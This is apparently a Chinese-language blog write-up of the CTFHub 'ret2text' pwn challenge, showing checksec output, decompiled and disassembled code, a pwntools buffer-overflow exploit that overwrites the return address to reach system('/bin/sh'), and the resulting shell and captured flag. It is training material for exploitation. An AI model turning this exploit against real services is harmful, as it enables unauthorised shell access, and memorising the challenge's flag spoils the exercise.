nc challenge-dbabb54d9de9a05e.sandbox.ctfhub.com 29815\n\u9644\u4ef6\uff1apwn<\/code><\/pre>\nROP\u8fc7\u7a0b<\/p>\n
\n\u95ee\u9898\u5206\u6790<\/p>\n
\u4e0b\u8f7d\u9644\u4ef6\uff0c\u89e3\u538b\u67e5\u770b\u57fa\u672c\u4fe1\u606f\u3002<\/p>\n![\"\"](\"https:\/\/i0.wp.com\/dreamc.top\/wp-content\/uploads\/2021\/10\/WV8B9DT7MJSGZF6A4.png?resize=631%2C77&ssl=1\")
<\/figure>\n \u53d1\u73b0\u662f\u4e2a64\u4f4d\u7684elf\u6587\u4ef6 \u3002<\/p>\n
\u7136\u540e\u6211\u4eec\u68c0\u67e5\u5b83\u7684\u4fdd\u62a4\u673a\u5236 \u3002<\/p>\n
root@192:\/home\/cjm\/\u684c\u9762# gdb\nGNU gdb (Debian 10.1-2) 10.1.90.20210103-git\nCopyright (C) 2021 Free Software Foundation, Inc. \nLicense GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType "show copying" and "show warranty" for details.\nThis GDB was configured as "x86_64-linux-gnu".\nType "show configuration" for configuration details.\nFor bug reporting instructions, please see:\n<https:\/\/www.gnu.org\/software\/gdb\/bugs\/>.\nFind the GDB manual and other documentation resources online at:\n <http:\/\/www.gnu.org\/software\/gdb\/documentation\/>.\n\nFor help, type "help".\nType "apropos word" to search for commands related to "word".\npwndbg: loaded 198 commands. Type pwndbg [filter] for a list.\npwndbg: created $rebase, $ida gdb functions (can be used with print\/break) \ngdb-peda$ checksec pwn\nCANARY : disabled\nFORTIFY : disabled\nNX : disabled\nPIE : disabled\nRELRO : Partial\ngdb-peda$ \n<\/code><\/pre>\n\u53d1\u73b0\u5b89\u5168\u63aa\u65bd\u90fd\u6ca1\u6709\u5f00\u542f\u3002\u6211\u4eec\u628a\u5b83\u653e\u8fdbIDA\u4e2d\uff0c\u6309F5\u8fdb\u884c\u53cd\u7f16\u8bd1\uff0c\u770b\u770bmain\u51fd\u6570\u7684\u6e90\u4ee3\u7801\u3002<\/p>\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n char v4[112]; \/\/ [rsp+0h] [rbp-70h] BYREF\n\n setvbuf(stdout, 0LL, 2, 0LL);\n setvbuf(stdin, 0LL, 1, 0LL);\n puts("Welcome to CTFHub ret2text.Input someting:");\n gets(v4);\n puts("bye");\n return 0;\n}<\/code><\/pre>\n\u6709\u4e00\u4e9b\u8f93\u5165\u8f93\u51fa\u51fd\u6570\u8c03\u7528\u4e14\u672a\u5bf9\u8f93\u5165\u6570\u636e\u8fdb\u884c\u957f\u5ea6\u9650\u5236\uff0c\u4e0b\u9762\u6211\u4eec\u518d\u770b\u770bsecure\u51fd\u6570\u5185\u5bb9<\/p>\n
int secure()\n{\n unsigned int v0; \/\/ eax\n int result; \/\/ eax\n int v2; \/\/ [rsp+8h] [rbp-8h] BYREF\n int v3; \/\/ [rsp+Ch] [rbp-4h]\n\n v0 = time(0LL);\n srand(v0);\n v3 = rand();\n __isoc99_scanf(&unk_4008C8, &v2);\n result = v2;\n if ( v3 == v2 )\n result = system("\/bin\/sh");\n return result;\n}<\/code><\/pre>\n\u91cc\u9762\u8c03\u7528\u4e86system('\/bin\/sh')<\/code>\u3002\u7531\u6b64\u53ef\u89c1\uff0c\u8fd9\u9053\u9898\u662f\u901a\u8fc7gets()<\/code>\u51fd\u6570\u4f20\u9012\u53d8\u91cf\u8986\u76d6\u8fd4\u56de\u5730\u5740\u6267\u884c system('\/bin\/sh')<\/code> \u83b7\u5f97shell\u3002<\/p>\n\u6211\u4eec\u9700\u8981\u77e5\u9053\u4e24\u4e2a\u5173\u952e\u4fe1\u606f\uff1a<\/p>\n
1.\u53d8\u91cf\u7684\u5730\u5740<\/p>\n
2.system('\/bin\/sh')<\/code> \u7684\u5185\u5b58\u5730\u5740<\/p>\n\u7b2c\u4e00\u6b65\uff0c\u901a\u8fc7peda\u8c03\u8bd5\uff0c\u53cd\u6c47\u7f16\u627e\u5230\u53d8\u91cf\u7684\u5730\u5740<\/p>\n
gdb-peda$ file .\/pwn\nReading symbols from .\/pwn...\n(No debugging symbols found in .\/pwn)\ngdb-peda$ disassemble main\nDump of assembler code for function main:\n 0x00000000004007c7 <+0>: push rbp\n 0x00000000004007c8 <+1>: mov rbp,rsp\n 0x00000000004007cb <+4>: sub rsp,0x70\n 0x00000000004007cf <+8>: mov rax,QWORD PTR [rip+0x20089a] # 0x601070 <stdout@@GLIBC_2.2.5>\n 0x00000000004007d6 <+15>: mov ecx,0x0\n 0x00000000004007db <+20>: mov edx,0x2\n 0x00000000004007e0 <+25>: mov esi,0x0\n 0x00000000004007e5 <+30>: mov rdi,rax\n 0x00000000004007e8 <+33>: call 0x400660 <setvbuf@plt>\n 0x00000000004007ed <+38>: mov rax,QWORD PTR [rip+0x20088c] # 0x601080 <stdin@@GLIBC_2.2.5>\n 0x00000000004007f4 <+45>: mov ecx,0x0\n 0x00000000004007f9 <+50>: mov edx,0x1\n 0x00000000004007fe <+55>: mov esi,0x0\n 0x0000000000400803 <+60>: mov rdi,rax\n 0x0000000000400806 <+63>: call 0x400660 <setvbuf@plt>\n 0x000000000040080b <+68>: lea rdi,[rip+0xc6] # 0x4008d8\n 0x0000000000400812 <+75>: call 0x400610 <puts@plt>\n 0x0000000000400817 <+80>: lea rax,[rbp-0x70]\n 0x000000000040081b <+84>: mov rdi,rax\n 0x000000000040081e <+87>: mov eax,0x0\n 0x0000000000400823 <+92>: call 0x400650 <gets@plt>\n 0x0000000000400828 <+97>: lea rdi,[rip+0xd4] # 0x400903\n 0x000000000040082f <+104>: call 0x400610 <puts@plt>\n 0x0000000000400834 <+109>: mov eax,0x0\n 0x0000000000400839 <+114>: leave \n 0x000000000040083a <+115>: ret \nEnd of assembler dump.\ngdb-peda$ \n<\/code><\/pre>\n\u53d8\u91cf\u5730\u5740\u4e3a[rbp-0x70]<\/code>\u3002\u6211\u4eec\u77e5\u9053\u572864\u4f4d\u7cfb\u7edf\u4e2d\uff0cebp\u53608\u5b57\u8282\u3002\u8fd9\u91ccrbp\u540e\u5c31\u662febp\uff0cebp\u540e\u624d\u662f\u8fd4\u56de\u5730\u5740\u3002\u6211\u4eec\u8981\u586b\u5145\u53d8\u91cf\u5230\u8986\u76d6\u8fd4\u56de\u5730\u5740\uff0c\u5c31\u8981\u4f7f\u53d8\u91cf\u957f\u5ea6\u4e3a0x70+8=0x78<\/code>(\u8fd9\u4e2a\u4e5f\u662f\u504f\u79fb\u957f\u5ea6)\u3002<\/p>\n\u7b2c\u4e8c\u6b65\uff0c\u540c\u6837\u53cd\u6c47\u7f16\u8c03\u8bd5<\/p>\n
gdb-peda$ disassemble secure\nDump of assembler code for function secure:\n 0x0000000000400777 <+0>: push rbp\n 0x0000000000400778 <+1>: mov rbp,rsp\n 0x000000000040077b <+4>: sub rsp,0x10\n 0x000000000040077f <+8>: mov edi,0x0\n 0x0000000000400784 <+13>: call 0x400640 <time@plt>\n 0x0000000000400789 <+18>: mov edi,eax\n 0x000000000040078b <+20>: call 0x400630 <srand@plt>\n 0x0000000000400790 <+25>: call 0x400680 <rand@plt>\n 0x0000000000400795 <+30>: mov DWORD PTR [rbp-0x4],eax\n 0x0000000000400798 <+33>: lea rax,[rbp-0x8]\n 0x000000000040079c <+37>: mov rsi,rax\n 0x000000000040079f <+40>: lea rdi,[rip+0x122] # 0x4008c8 \n 0x00000000004007a6 <+47>: mov eax,0x0\n 0x00000000004007ab <+52>: call 0x400670 <__isoc99_scanf@plt>\n 0x00000000004007b0 <+57>: mov eax,DWORD PTR [rbp-0x8]\n 0x00000000004007b3 <+60>: cmp DWORD PTR [rbp-0x4],eax\n 0x00000000004007b6 <+63>: jne 0x4007c4 <secure+77>\n 0x00000000004007b8 <+65>: lea rdi,[rip+0x10c] # 0x4008cb \n 0x00000000004007bf <+72>: call 0x400620 <system@plt>\n 0x00000000004007c4 <+77>: nop\n 0x00000000004007c5 <+78>: leave \n 0x00000000004007c6 <+79>: ret \nEnd of assembler dump.\n<\/code><\/pre>\n\u7531\u4e8e\u8981\u8c03\u7528\u8be5\u8bed\u53e5\uff0c\u5c31\u62ff\u8be5\u8bed\u53e5\u7684\u5730\u57400x4007b8<\/code>\u3002<\/p>\n\u7f16\u5199exp<\/p>\n
from pwn import *\nhost = 'challenge-dbabb54d9de9a05e.sandbox.ctfhub.com'\nport = 29815\n#p = process(".\/pwn")\np = connect(host, port)\npayload = 'A' * 0x78 + p64(0x4007b8)\np.sendline(payload)\np.interactive()<\/code><\/pre>\n\u5982\u82e5\u51fa\u73b0\u9519\u8befTypeError: can only concatenate str (not "bytes") to str<\/code>\uff0c\u662f\u56e0\u4e3apython3\u4e2dbytes\u7c7b\u578b\u4e0d\u80fd\u4e0estr\u7c7b\u578b\u76f4\u63a5\u76f8\u52a0\uff0c\u53ef\u4ee5\u5199\u6210\u8fd9\u6837\u6765 b'A' * 0x78 + p64(0x4007b8) <\/code>\u6765\u907f\u514d\u62a5\u9519\u3002<\/p>\n\u8fd0\u884c\u62ff\u5230flag\u3002<\/p>\n
[x] Opening connection to challenge-dbabb54d9de9a05e.sandbox.ctfhub.com on port 29815\n[x] Opening connection to challenge-dbabb54d9de9a05e.sandbox.ctfhub.com on port 29815: Trying 47.98.148.7\n[+] Opening connection to challenge-dbabb54d9de9a05e.sandbox.ctfhub.com on port 29815: Done\n[*] Switching to interactive mode\nWelcome to CTFHub ret2text.Input someting:\nbye\nls\nbin\ndev\nflag\nlib\nlib32\nlib64\npwn\ncat flag\nctfhub{ef5af582ab6cd2dc8fbc897e}\n<\/code><\/pre>\n